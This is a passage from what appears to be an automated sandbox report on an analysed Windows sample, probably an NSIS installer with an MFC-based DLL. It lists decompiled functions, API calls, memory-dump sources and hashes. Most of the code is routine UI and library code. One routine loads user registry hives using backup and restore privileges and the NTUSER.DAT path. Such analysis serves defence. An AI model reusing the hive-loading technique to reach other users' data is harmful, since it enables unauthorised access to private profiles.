							_t34 = GetSysColor(_t34);
						}
						if((_t49[5] & 0x00000001) != 0) {
							SetTextColor(_a4, _t34);
						}
						SetBkMode(_a4, _t49[4]);
						_t36 = _t49[1];
						_v16.lbColor = _t36;
						if((_t49[5] & 0x00000008) != 0) {
							_t36 = GetSysColor(_t36);
							_v16.lbColor = _t36;
						}
						if((_t49[5] & 0x00000004) != 0) {
							SetBkColor(_a4, _t36);
						}
						if((_t49[5] & 0x00000010) != 0) {
							_v16.lbStyle = _t49[2];
							_t38 = _t49[3];
							if(_t38 != 0) {
								DeleteObject(_t38);
							}
							_t49[3] = CreateBrushIndirect( &_v16);
						}
						_t32 = _t49[3];
					}
				}
				return _t32;
			}









                                                                                                                                                    0x00403e05
                                                                                                                                                    0x00403e99
                                                                                                                                                    0x00403e99
                                                                                                                                                    0x00403e0b
                                                                                                                                                    0x00403e16
                                                                                                                                                    0x00403e1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403e1c
                                                                                                                                                    0x00403e20
                                                                                                                                                    0x00403e29
                                                                                                                                                    0x00403e2c
                                                                                                                                                    0x00403e2c
                                                                                                                                                    0x00403e32
                                                                                                                                                    0x00403e38
                                                                                                                                                    0x00403e38
                                                                                                                                                    0x00403e44
                                                                                                                                                    0x00403e4e
                                                                                                                                                    0x00403e51
                                                                                                                                                    0x00403e54
                                                                                                                                                    0x00403e57
                                                                                                                                                    0x00403e59
                                                                                                                                                    0x00403e59
                                                                                                                                                    0x00403e61
                                                                                                                                                    0x00403e67
                                                                                                                                                    0x00403e67
                                                                                                                                                    0x00403e71
                                                                                                                                                    0x00403e76
                                                                                                                                                    0x00403e79
                                                                                                                                                    0x00403e7e
                                                                                                                                                    0x00403e81
                                                                                                                                                    0x00403e81
                                                                                                                                                    0x00403e91
                                                                                                                                                    0x00403e91
                                                                                                                                                    0x00403e94
                                                                                                                                                    0x00403e94
                                                                                                                                                    0x00403e1a
                                                                                                                                                    0x00403e9d

                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                    • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                    • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                    • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                    • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                    • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65EA35, Relevance: 12.1, APIs: 8, Instructions: 60memorystringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 6E65EA49
                                                                                                                                                    • lstrcmpW.KERNEL32(00000000,?), ref: 6E65EA5A
                                                                                                                                                    • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6E65EA6F
                                                                                                                                                    • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6E65EA8F
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6E65EA97
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 6E65EAA1
                                                                                                                                                    • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6E65EAB2
                                                                                                                                                    • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6E65EACA
                                                                                                                                                      • Part of subcall function 6E65DA53: GlobalFlags.KERNEL32(?), ref: 6E65DA60
                                                                                                                                                      • Part of subcall function 6E65DA53: GlobalUnlock.KERNEL32(?,?,?,?,6E65EAC4,?,00000000,?,?,00000000,00000000,00000002), ref: 6E65DA6E
                                                                                                                                                      • Part of subcall function 6E65DA53: GlobalFree.KERNEL32 ref: 6E65DA7A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 168474834-0
                                                                                                                                                    • Opcode ID: 356218f973c82e33a90a1a030f38c5468076c981bb9da895c129acc729077cdb
                                                                                                                                                    • Instruction ID: 3634b0db6d5d998bcc6d810934410854b14d4c4bba8a81b3a148f93064db61fb
                                                                                                                                                    • Opcode Fuzzy Hash: 356218f973c82e33a90a1a030f38c5468076c981bb9da895c129acc729077cdb
                                                                                                                                                    • Instruction Fuzzy Hash: E8118CB1140A08BEEF129FF0CD84EEB7BADEF05748B004829B60690131DB319E60DB20
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E622170, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 244registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E628020: RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 6E628055
                                                                                                                                                      • Part of subcall function 6E628270: RegCloseKey.ADVAPI32(?), ref: 6E62828E
                                                                                                                                                    • RegLoadKeyW.ADVAPI32(80000003,00000000,00000000,00000000,00000000,?,?,00000000,3920FDCC), ref: 6E62253A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseEnumLoad
                                                                                                                                                    • String ID: ProfileImagePath$SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList$SeBackupPrivilege$SeRestorePrivilege$\NTUSER.DAT
                                                                                                                                                    • API String ID: 3456385632-2785325313
                                                                                                                                                    • Opcode ID: f3b7e0849b8a5d847f86cbcf66e749ba6c4116f36d22580a19c390aa0f3e12cc
                                                                                                                                                    • Instruction ID: 2279afa6d1dd35b1468c3bb473804a1747d211004767671bc7b8eea6d0fdb162
                                                                                                                                                    • Opcode Fuzzy Hash: f3b7e0849b8a5d847f86cbcf66e749ba6c4116f36d22580a19c390aa0f3e12cc
                                                                                                                                                    • Instruction Fuzzy Hash: C8B15A7085516CDEDB24DBA4DC98BEDB778AF24308F2046E8D019671A1EB742F88CF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64B920, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E64B520: QueryInformationJobObject.KERNEL32 ref: 6E64B5A8
                                                                                                                                                      • Part of subcall function 6E64B520: GetLastError.KERNEL32(?,?,?,3920FDCC), ref: 6E64B5B2
                                                                                                                                                      • Part of subcall function 6E64B520: Concurrency::details::_Condition_variable::_Condition_variable.LIBCMTD ref: 6E64B624
                                                                                                                                                    • Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack.LIBCPMTD ref: 6E64B9B9
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64BA02
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64BA44
                                                                                                                                                    • std::exception::exception.LIBCMTD ref: 6E64BA53
                                                                                                                                                    • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 6E64BA92
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorConcurrency::details::_CreationDebugHeapTask$CallstackCallstack::_Condition_variableCondition_variable::_Container_base12Container_base12::~_ErrorInformationLastObjectQuerystd::_std::exception::exception
                                                                                                                                                    • String ID: 2hn
                                                                                                                                                    • API String ID: 3487191890-194944376
                                                                                                                                                    • Opcode ID: d8e59247190670730c9080dc55931d67fcd70e2eba023bd56e5cd8fdfdfc7d43
                                                                                                                                                    • Instruction ID: 44e9d374e41c590f12579557c87edcd13a1c4976c22d9e67fdad22ffd3e3df9c
                                                                                                                                                    • Opcode Fuzzy Hash: d8e59247190670730c9080dc55931d67fcd70e2eba023bd56e5cd8fdfdfc7d43
                                                                                                                                                    • Instruction Fuzzy Hash: F6510470D04248DFCB04CFE8D994BEEBBB9BF59304F208569D025A7294EB342A04CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6543F4, Relevance: 10.6, APIs: 7, Instructions: 118windowthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E65433F: GetParent.USER32(?), ref: 6E65439F
                                                                                                                                                      • Part of subcall function 6E65433F: GetLastActivePopup.USER32(?), ref: 6E6543B9
                                                                                                                                                      • Part of subcall function 6E65433F: IsWindowEnabled.USER32(?), ref: 6E6543CD
                                                                                                                                                      • Part of subcall function 6E65433F: EnableWindow.USER32(?,00000000), ref: 6E6543E0
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 6E65443F
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 6E654455
                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 6E65445F
                                                                                                                                                    • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6E654475
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 6E6544F8
                                                                                                                                                    • MessageBoxW.USER32(?,?,?,00000000), ref: 6E65451A
                                                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 6E65453F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Enable$MessageProcess$ActiveCurrentEnabledFileLastModuleNameParentPopupSendThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1924968399-0
                                                                                                                                                    • Opcode ID: b31a9633f187b13f23ec0dfdd1377800fb15cce306ad144264c5287b8a5468ba
                                                                                                                                                    • Instruction ID: 6d36e5c28b6e3be27d7817155f61fecd9f33f8011156a25c1ce5e3be8469f62d
                                                                                                                                                    • Opcode Fuzzy Hash: b31a9633f187b13f23ec0dfdd1377800fb15cce306ad144264c5287b8a5468ba
                                                                                                                                                    • Instruction Fuzzy Hash: AC41A175B80219AFDB50CFA5CC987EE73B9EB06710F1005E9E51AD7340D7B08DA18B61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6575E3, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 102libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6E65760E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTouchInputInfo), ref: 6E657643
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseTouchInputHandle), ref: 6E65766B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                    • String ID: CloseTouchInputHandle$GetTouchInputInfo$user32.dll
                                                                                                                                                    • API String ID: 667068680-1853737257
                                                                                                                                                    • Opcode ID: 953c793045447bd56a37c416d37b50267d7e5b55cd66596590d86a0f0291e5c6
                                                                                                                                                    • Instruction ID: 1a7d6c1d8ba997a26572bdd315635b04fed84c303be4479dbb005b96571827c7
                                                                                                                                                    • Opcode Fuzzy Hash: 953c793045447bd56a37c416d37b50267d7e5b55cd66596590d86a0f0291e5c6
                                                                                                                                                    • Instruction Fuzzy Hash: 4B318334750612ABDF459FEADA1895A3FE5FB5B3B0700442AE802D7380DB36F811CAA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E636E10, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task
                                                                                                                                                    • String ID: at line $, column
                                                                                                                                                    • API String ID: 1384045349-191570568
                                                                                                                                                    • Opcode ID: 2dc2ca0d146bd2cd4b409a5a65ee63a4695f32156c393ebcecf6e75c0a7a6017
                                                                                                                                                    • Instruction ID: 3a4d9213d623e05b05d7cdf55ca4df033895844f51596375c082a98ea2035e99
                                                                                                                                                    • Opcode Fuzzy Hash: 2dc2ca0d146bd2cd4b409a5a65ee63a4695f32156c393ebcecf6e75c0a7a6017
                                                                                                                                                    • Instruction Fuzzy Hash: 694105B5D00158EBDB14CFA8D940BDDBBB8BB48304F2485ADE409AB342EB316A44DF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E654F1F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78libraryloaderthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E65AA2A: __EH_prolog3.LIBCMT ref: 6E65AA31
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6E654F47
                                                                                                                                                    • SetWindowsHookExW.USER32(00000005,6E6588DC,00000000,00000000), ref: 6E654F57
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6E654FBA
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,6E650A4D), ref: 6E654FCA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressCurrentFreeH_prolog3HookLibraryProcThreadWindows
                                                                                                                                                    • String ID: HtmlHelpW$hhctrl.ocx
                                                                                                                                                    • API String ID: 3379832378-3773518134
                                                                                                                                                    • Opcode ID: 1de684ac1e27fd46ad342baf029514f0295e9445a545b079f33cc75408f6f53a
                                                                                                                                                    • Instruction ID: 5d821390e783daaa3be7b3a1c1f0e97ffa2ff896623172335efea2b3fdc303ee
                                                                                                                                                    • Opcode Fuzzy Hash: 1de684ac1e27fd46ad342baf029514f0295e9445a545b079f33cc75408f6f53a
                                                                                                                                                    • Instruction Fuzzy Hash: 5821D331740B06AFD7215FE6DC14B4B7BA8EF82766F005829F5579A740DB70D430C6A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E674C6C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                    • API String ID: 0-537541572
                                                                                                                                                    • Opcode ID: d9f5f492405d17ba1d41979c7f21fbc8c6b90ba93b5f56f9483e06947d38182c
                                                                                                                                                    • Instruction ID: 83e05b67d99d6f97aef7314c42f4721baed4b89919e75d8a9097be69ca65e347
                                                                                                                                                    • Opcode Fuzzy Hash: d9f5f492405d17ba1d41979c7f21fbc8c6b90ba93b5f56f9483e06947d38182c
                                                                                                                                                    • Instruction Fuzzy Hash: 0521BB72A45626BBDF31CAE98C4CA4B3768AF03B60F210510ED55AB390DBB0DD0286F0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00404F9E, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00404F9E(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v52;
				long _v64;
				int _v68;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t27;
				WCHAR* _t28;
				signed int _t38;
				signed int _t39;

				_t27 =  *0x476a6c;
				_v8 = _t27;
				if(_t27 == 0) {
					return _t27;
				}
				_t38 =  *0x47eb94;
				_v12 = _t38;
				_t39 = _t38 & 0x00000001;
				if(_t39 == 0) {
					E00406831(_t39, 0, 0x445d80, 0x445d80, _a4);
				}
				_t28 = lstrlenW(0x445d80);
				_a4 = _t28;
				if(_a8 == 0) {
					L6:
					if((_v12 & 0x00000004) == 0) {
						_t28 = SetWindowTextW( *0x476a78, 0x445d80);
					}
					if((_v12 & 0x00000002) == 0) {
						_v52 = 0x445d80;
						_v72 = 1;
						_v68 = SendMessageW(_v8, 0x1004, 0, 0) - _t39;
						_v64 = 0;
						SendMessageW(_v8, 0x104d - _t39, 0,  &_v72);
						_t28 = SendMessageW(_v8, 0x1013, _v68, 0);
					}
					if(_t39 != 0) {
						_t28 = 0;
						0x445d80[_a4] = 0;
					}
					goto L12;
				} else {
					_t28 = lstrlenW(_a8) + _a4;
					if(_t28 >= 0x8010) {
						L12:
						return _t28;
					}
					_t28 = lstrcatW(0x445d80, _a8);
					goto L6;
				}
			}
















                                                                                                                                                    0x00404fa4
                                                                                                                                                    0x00404fac
                                                                                                                                                    0x00404fb1
                                                                                                                                                    0x00405070
                                                                                                                                                    0x00405070
                                                                                                                                                    0x00404fb8
                                                                                                                                                    0x00404fbe
                                                                                                                                                    0x00404fc1
                                                                                                                                                    0x00404fca
                                                                                                                                                    0x00404fd0
                                                                                                                                                    0x00404fd0
                                                                                                                                                    0x00404fd6
                                                                                                                                                    0x00404fdb
                                                                                                                                                    0x00404fe1
                                                                                                                                                    0x00404ffe
                                                                                                                                                    0x00405002
                                                                                                                                                    0x0040500b
                                                                                                                                                    0x0040500b
                                                                                                                                                    0x00405015
                                                                                                                                                    0x00405021
                                                                                                                                                    0x0040502a
                                                                                                                                                    0x00405035
                                                                                                                                                    0x00405048
                                                                                                                                                    0x0040504b
                                                                                                                                                    0x00405059
                                                                                                                                                    0x00405059
                                                                                                                                                    0x0040505d
                                                                                                                                                    0x00405062
                                                                                                                                                    0x00405064
                                                                                                                                                    0x00405064
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404fe3
                                                                                                                                                    0x00404feb
                                                                                                                                                    0x00404ff3
                                                                                                                                                    0x0040506c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040506d
                                                                                                                                                    0x00404ff9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404ff9

                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(00445D80,00425AD2,74B5EA30,00000000), ref: 00404FD6
                                                                                                                                                    • lstrlenW.KERNEL32(004034E5,00445D80,00425AD2,74B5EA30,00000000), ref: 00404FE6
                                                                                                                                                    • lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
                                                                                                                                                    • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425AD2,74B5EA30,00000000), ref: 00406902
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2740478559-0
                                                                                                                                                    • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                    • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                    • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                    • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65838D, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 70libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,user32.dll), ref: 6E65839E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 6E6583B0
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,UnregisterTouchWindow), ref: 6E6583BE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                    • String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
                                                                                                                                                    • API String ID: 667068680-2470269259
                                                                                                                                                    • Opcode ID: 9ab24c76b5bb535be8c04508df44aed15f0b94ebe343481a29b175733e2fb281
                                                                                                                                                    • Instruction ID: a14aa3f7be2f3a168ca4e9480e187a1ff263aeae88a11d3c201e9c1226e1d3fe
                                                                                                                                                    • Opcode Fuzzy Hash: 9ab24c76b5bb535be8c04508df44aed15f0b94ebe343481a29b175733e2fb281
                                                                                                                                                    • Instruction Fuzzy Hash: A7112632310A16BBC7012AEAC89855FBB69FF56365B000136FD0687B10CB30ECA186E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E67B535, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
